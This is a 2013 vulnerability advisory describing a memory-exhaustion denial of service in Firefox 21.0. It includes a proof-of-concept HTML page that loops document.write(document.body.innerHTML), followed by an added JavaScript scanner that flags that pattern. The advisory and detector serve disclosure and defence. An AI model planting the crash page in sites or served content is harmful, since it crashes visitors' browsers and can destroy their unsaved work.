Title         : Mozilla Firefox Browser 21.0 Remote Denial Of Service
Author        : Jigsaw (Abdelmorite Eljoaydi)
Date          : 22-06-2013
E-mail        : jigsaw0658@gmail.com
Home          : Morocco
Facebook page : facebook.com/abdelmorit.alma
Platform      : software
Impact        : Denial Of Service (all tabs are no longer accessible, your work might be lost)
Tested on     : Mozilla Firefox 21.0, the latest release
OS            : Tested on Windows 7 / Windows XP
Risk          : Low[+] / Medium[-]

===========================================================================================

#Vulnerability:

This bug is a typical result of an endless dialog loop. The flaw exists when the
attacker puts document.write(document.body.innerHTML) in a loop with many
iterations, which leaves the browser unable to handle the exception so that it
falls into an Out of Memory condition. User interaction is required to exploit
this vulnerability, in that the target must visit a malicious web page.

===========================================================================================

#Proof of Concept:

<html>
<body>
<script>
document.write("")
</script>
</body>
<script>
var i=0;
for (i=0;i<=99;i++)
{
  document.write(document.body.innerHTML);
}
</script>
</html>

===========================================================================================
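
#Detection sketch (added example, not part of the original advisory and not Mozilla code):

A heuristic triage check for pages whose inline script writes the live document back into itself, as described under #Vulnerability. The function names (inlineScripts, classify, scanAll) and the sample pages are constructed for illustration; external scripts and aliased calls are assumed out of scope.

```javascript
// Added example: heuristic scanner for the write-the-document-back-into-itself
// pattern. All names and the sample pages are constructed for illustration.

// Collect the bodies of inline <script> elements from an HTML string.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// document.write()/writeln() whose argument reads the live document back.
const SELF_WRITE = new RegExp(
  "document\\s*\\.\\s*write(?:ln)?\\s*\\(\\s*document\\s*\\.\\s*" +
  "(?:body|documentElement)\\s*\\.\\s*(?:inner|outer)HTML");
const LOOP = /\b(?:for|while|do)\b/;

// Returns "none", "self-write" or "self-write-in-loop" (the advisory's pattern).
function classify(html) {
  let verdict = "none";
  for (const body of inlineScripts(html)) {
    const hit = SELF_WRITE.exec(body);
    if (!hit) continue;
    // Approximation: a loop keyword earlier in the same script counts as enclosing.
    if (LOOP.test(body.slice(0, hit.index))) return "self-write-in-loop";
    verdict = "self-write";
  }
  return verdict;
}

// Constructed sample pages; "advisory" has the same shape as the PoC above.
const SAMPLES = {
  advisory: '<html><body><script>document.write("")</script></body><script>' +
    "var i=0; for (i=0;i<=99;i++) { document.write(document.body.innerHTML); }" +
    "</script></html>",
  single: "<body><p>x</p><script>document.write(document.body.innerHTML);</script></body>",
  benign: '<body><script>for (var i=0;i<3;i++) { document.write("<p>" + i + "</p>"); }' +
    "</script></body>",
};

function scanAll(samples) {
  return Object.fromEntries(
    Object.entries(samples).map(([name, html]) => [name, classify(html)]));
}

console.log(scanAll(SAMPLES));
```

The loop test is a lexical approximation, so a hit is a reason to review the page, not a verdict.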